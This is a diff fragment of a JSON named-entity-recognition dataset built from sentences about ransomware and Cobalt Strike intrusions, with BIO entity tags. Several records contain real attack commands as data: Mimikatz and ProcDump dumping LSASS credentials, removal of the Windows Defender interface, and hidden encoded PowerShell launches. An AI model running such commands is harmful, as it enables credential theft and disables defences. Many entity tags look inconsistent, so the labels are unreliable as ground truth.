+ "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "moved", + "to", + "install", + "AnyDesk", + "on", + "several", + "servers", + "including", + "a", + "backup", + "management", + "host,", + "likely", + "as", + "a", + "further", + "means", + "of", + "persistence", + "or", + "later", + "command", + "and", + "control." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "they", + "connected", + "to", + "a", + "domain", + "controller", + "and", + "dropped", + "three", + "scripts;", + "one", + "to", + "copy", + "the", + "ransomware", + "executable", + "to", + "all", + "hosts,", + "one", + "to", + "reset", + "every", + "users", + "password", + "in", + "the", + "organization,", + "and", + "a", + "final", + "one", + "to", + "execute", + "the", + "staged", + "ransomware", + "payload", + "using", + "PsExec" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "executing", + "it", + "via", + "a", + "remote", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "proceeded", + "to", + "dump", + "LSASS", + "memory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ProcDump", + "was", + "used", + "to", + "dump", + "LSASS", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "several", + "different", + "Mimikatz", + "implementations", + "were", + "executed", + "on", + "the", + "domain", + "controller,", + "including", + "a", + "Mimikatz", + "executable" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "There", + "were", + "several", + "variants", + "of", + "Mimikatz", + "in", + "binary", + "and", + "PowerShell", + "form" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "mimikatz.exe", + "\"privilege::debug\"", + "\"sekurlsa::logonpasswords\"" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "mimikatz.exe", + "privilege::debug", + "sekurlsa::logonPasswords", + "full", + "samdump" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Multiple", + "injections", + "into", + "the", + "LSASS", + "process", + "were", + "observed", + "on", + "multiple", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LSASS", + "process", + "to", + "access", + "credentials." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "dump", + "of", + "the", + "LSASS", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "lsass.exe", + "beacon" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "c:\\windows\\temp\\procdump64.exe", + "-accepteula", + "-ma", + "lsass.exe" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Several", + "more", + "beacons", + "were", + "also", + "loaded", + "on", + "the", + "host", + "using", + "DLLs", + "and", + "PowerShell." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "the", + "threat", + "actor", + "moved", + "on", + "to", + "downloading", + "a", + "variety", + "of", + "beacon", + "executables" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "to", + "execute", + "various", + "dropped", + "tools", + "or", + "beacons", + "on", + "the", + "endpoint," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "files", + "that", + "where", + "downloaded", + "from", + "those", + "sites:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "file", + "downloads", + "relating", + "to", + "tooling/scripts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "downloaded", + "the", + "lsass.exe", + "beacon", + "from", + "their", + "attacker", + "hosted", + "infrastructure" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lots", + "of", + "custom", + "scripts", + "dropped", + "by", + "threat", + "actors" + ], + "ner_tags": [ + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Other", + "tools", + "and", + "scripts", + "were", + "dropped", + "onto", + "one", + "endpoint" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "often", + "opened", + "Internet", + "Explorer", + "to", + "download", + "their", + "beacons" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "dropped", + "the", + "first", + "of", + "their", + "ransomware", + "binaries", + "on", + "the", + "fourth", + "day", + "of", + "the", + "intrusion" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "had", + "the", + "clear", + "text", + "credentials", + "for", + "one", + "of", + "the", + "domain", + "administrator", + "accounts", + "and", + "began", + "moving", + "lateral", + "to", + "other", + "systems" + ], + "ner_tags": [ + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "issued", + "remote", + "commands", + "using", + "WMIC", + "to", + "conduct", + "discovery,", + "as", + "well", + "as", + "distribute", + "and", + "execute", + "Cobalt", + "Strike", + "beacons." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "additional", + "beacons", + "executed", + "using", + "remote", + "WMIC", + "commands," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "executed", + "using", + "remote", + "WMI", + "commands" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "use", + "of", + "WMIC", + "was", + "leveraged", + "by", + "a", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "wmic", + "/node" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "used", + "the", + "lolbin", + "wmic.exe", + "in", + "order", + "to", + "execute", + "PowerShell", + "Cobalt", + "Strike", + "beacons", + "on", + "multiple", + "workstations", + "and", + "servers" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "WmiPrvSe.exe", + "(WMI", + "Provider", + "Host)", + "executed", + "the", + "PowerShell", + "Cobalt", + "Strike", + "beacon", + "on", + "the", + "remote", + "computers." + ], + "ner_tags": [ + "B-Way", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "proceeded", + "to", + "RDP", + "to", + "the", + "domain", + "controller." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "starting", + "the", + "RDP", + "session" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "run", + "from", + "their", + "interactive", + "RDP", + "session" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "proxy", + "RDP", + "connections", + "and", + "connect", + "to", + "another", + "computer." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "use", + "of", + "RDP", + "was", + "extensively", + "used", + "throughout", + "the", + "intrusion,", + "using", + "a", + "variety", + "of", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "establishing", + "RDP", + "connections" + ], + "ner_tags": [ + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "these", + "RDP", + "sessions," + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "This", + "file", + "was", + "opened", + "during", + "their", + "RDP", + "session", + "and", + "contained", + "the", + "PowerShell", + "commands", + "used", + "to", + "launch", + "a", + "new", + "beacon:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RDP", + "traffic", + "and", + "minimize", + "external", + "RDP", + "access" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "RDP", + "traffic" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "They", + "then", + "opened", + "an", + "RDP", + "connection", + "back", + "to", + "the", + "primary", + "domain", + "controller" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "executed", + "a", + "PowerShell", + "command", + "to", + "disable", + "Windows", + "Defender", + "Antivirus", + "on", + "the", + "host" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Windows", + "Defender", + "tampering" + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "B-SecTeam" + ] + }, + { + "tokens": [ + "powershell.exe", + "Uninstall-WindowsFeature", + "-Name", + "Windows-Defender-GUI" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "reviewed", + "Group", + "Policy", + "Objects", + "for", + "the", + "domain." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "user", + "clicked", + "on", + "the", + "ISO", + "file,", + "which", + "created", + "a", + "new", + "virtual", + "hard", + "drive", + "disk" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "when", + "the", + "victim", + "clicked", + "on", + "the", + "LNK", + "file,", + "it", + "triggered", + "the", + "execution", + "of", + "the", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Clicking", + "on", + "the", + "LNK", + "file", + "executes", + "the", + "batch", + "file" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "hidden", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "located", + "in", + "a", + "hidden", + "folder" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "hidden", + "view", + "attribute", + "in", + "file", + "explorer", + "in", + "reference", + "to", + "the", + "ProgramData", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "delivered", + "a", + "hidden", + "directory" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "ISO", + "file", + "was", + "delivered", + "as", + "a", + "ZIP", + "archive", + "via", + "a", + "malicious", + "spam", + "mail", + "campaign." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "DLL", + "was", + "executed", + "using", + "rundll32.exe", + ":", + "C:\\Windows\\system32\\cmd.exe", + "/c", + "D:\\max\\eyewear.bat", + "➝", + "rundll32" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "process", + "was", + "invoked", + "by", + "RunDLL32.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "malware", + "running", + "via", + "Rundll32" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "file", + "was", + "executed", + "by", + "the", + "injected", + "Rundll32.exe", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "a", + "single", + "Rundll32.exe", + "process" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "rundll32", + "locker_32.dll,run" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "loads", + "it", + "using", + "rundll32" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decoded", + "PowerShell", + "function" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decoded", + "from", + "Base64:" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "scheduled", + "task", + "was", + "then", + "created", + "using", + "this", + "same", + "DLL." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "scheduled", + "task", + "was", + "created", + "at", + "that", + "time", + "to", + "maintain", + "persistence", + "on", + "this", + "host" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "GetSystem", + "creates", + "a", + "service" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "inject", + "a", + "new", + "beacon", + "or", + "a", + "specific", + "program", + "to", + "another", + "process", + "on", + "the", + "victim’s", + "computer." + ], + "ner_tags": [ + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "injection", + "is", + "also", + "visible", + "from", + "memory", + "dumps" + ], + "ner_tags": [ + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Several", + "hosts", + "showed", + "rundll32", + "processes", + "exhibiting", + "common", + "process", + "injection", + "behavior" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Code", + "injection", + "in", + "LSASS" + ], + "ner_tags": [ + "I-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "injected", + "Cobalt", + "Strike", + "beacon" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "I-Way", + "I-Way" + ] + }, + { + "tokens": [ + "the", + "injected", + "Rundll32.exe", + "process." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "common", + "processes", + "observed", + "were", + "two", + "injected", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "beacon", + "injected", + "into", + "a", + "single", + "Rundll32.exe", + "process" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "to", + "discover", + "information", + "relating", + "to", + "the", + "user" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "host," + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "/C", + "hostname" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "systeminfo" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "queried", + "a", + "number", + "of", + "target", + "hosts", + "to", + "determine", + "the", + "host", + "disk", + "drive", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "can", + "be", + "useful", + "to", + "determine", + "drives,", + "including", + "mounted", + "network", + "shares." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "logicaldisk", + "get", + "caption,description,drivetype,providername,volumename" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "network", + "configuration" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "ipconfig", + "/all" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "ipconfig" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\system32\\cmd.exe", + "/C", + "dir", + "/s", + "*file/" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "threat", + "actors", + "used", + "the", + "dir", + "command" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "C:\\Windows\\System32\\cmd.exe", + "/C", + "dir" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "was", + "double", + "base64", + "encoded." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "Base64", + "encoded", + "string:", + "The", + "-e", + "is", + "short", + "for", + "-EncodedCommand." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "base64", + "encoding", + "starts", + "with", + "JAB", + "that", + "is", + "a", + "common", + "pattern", + "for", + "UTF-16", + "starting", + "with", + "$" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShell", + "encoded", + "commands:" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "powershell", + "-np", + "-w", + "hidden", + "-encodedcommand" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "to", + "proxy" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Proxying", + "RDP", + "traffic", + "via", + "a", + "processes", + "such", + "as", + "a", + "Cobalt", + "Strike", + "beacon", + "reduces", + "the", + "exposure", + "of", + "the", + "threat", + "actor’s", + "own", + "infrastructure,", + "and", + "blends", + "RDP", + "activity", + "to", + "those", + "of", + "internal", + "hosts", + "on", + "the", + "network." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "threat", + "actors", + "made", + "attempts", + "to", + "proxy", + "RDP", + "traffic" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "the", + "RDP", + "traffic", + "was", + "being", + "proxied", + "through" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attempted", + "to", + "masquerade", + "dropped", + "files", + "as", + "legitimate", + "Microsoft", + "Windows", + "executables" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "file", + "was", + "unpacked" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "documents", + "were", + "exfiltrated", + "over", + "one", + "of", + "the", + "encrypted", + "C2", + "channels." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "the", + "payload", + "was", + "executed,", + "there", + "were", + "some", + "telltale", + "registry", + "events", + "observed" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "files", + "were", + "then", + "deleted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "packed", + "versions", + "uploaded", + "to", + "VT" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "pack", + "the", + "code’s", + "dependencies", + "into", + "the", + ".NET", + "assembly", + "so", + "it", + "can", + "run", + "self-contained." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "compression", + "using", + "QuickLZ" + ], + "ner_tags": [ + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "with", + "names", + "invoking", + "popular", + "videogames", + "such", + "as", + "Fortnite,", + "Valorant,", + "Roblox", + "or", + "Warzone2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "create", + "a", + "legitimate", + "looking", + "folder", + "to", + "drop", + "an", + "illicit", + "version", + "of", + "the", + "System", + "Configuration", + "Utility", + "msconfig.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "creates", + "the", + "folder", + "“C:Windows", + "System32”,", + "with", + "a", + "space", + "after", + "Windows" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "packaged", + "into", + "an", + "obfuscated", + "PowerShell", + "batch", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "heavily", + "obfuscated", + "batch", + "file", + "is", + "hidden", + "and", + "automatically", + "executed", + "when", + "launched." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "script", + "extracts", + "two", + "separate", + "binaries", + "from", + "the", + "base64", + "encoded", + "text" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "another", + "obfuscated", + "binary", + "carrying", + "an", + "embedded", + "resource" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "extraction", + "of", + "the", + "resources", + "leads", + "to", + "the", + "final", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Option", + "to", + "embed", + "additional", + "malware", + "to", + "be", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "rootkit’s", + "DLL", + "that", + "is", + "embedded", + "as", + "a", + "resource" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "fileless", + "and", + "executed", + "only", + "in", + "memory", + "after", + "going", + "through", + "several", + "decryptions", + "and", + "decompression", + "routines" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AES", + "decrypts,", + "and", + "GZIP", + "decompresses", + "it", + "to", + "produce", + "two", + "separate", + "byte", + "arrays" + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "will", + "be", + "decompressed", + "and", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decompress", + "and", + "decrypt", + "the", + "final", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Hooks", + "several", + "functions", + "from", + "ntdll.dll", + "to", + "hide", + "its", + "presence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "leveraging", + "Windows", + "Management", + "Instrumentation", + "(WMI)", + "to", + "identify", + "the", + "system’s", + "manufacturer." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "identify", + "the", + "system’s", + "manufacturer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "delivered", + "to", + "the", + "victim,", + "commonly", + "through", + "a", + "phishing", + "mail" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way" + ] + }, + { + "tokens": [ + "receives", + "a", + "ZIP", + "file", + "containing", + "a", + "benign", + "file", + "in", + "plain", + "sight" + ], + "ner_tags": [ + "O", + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "automatically", + "executed", + "when", + "launched." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "bat", + "file", + "format" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "spawned", + "with", + "PowerShell", + "via", + "Task", + "Scheduler" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "PowerShell." + ], + "ner_tags": [ + "O", + "B-Way" + ] + }, + { + "tokens": [ + "base64", + "encoded", + "text", + "later", + "in", + "the", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "more", + "obfuscation", + "and", + "encryption", + "techniques", + "that", + "lead", + "to", + "the", + "final", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "stored", + "as", + "obfuscated", + "data", + "in", + "the", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "prefix", + "is", + "used", + "to", + "hide", + "files,", + "directories,", + "NamedPipes,", + "scheduled", + "tasks,", + "processes,", + "registry", + "keys/values,", + "and", + "services." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "O", + 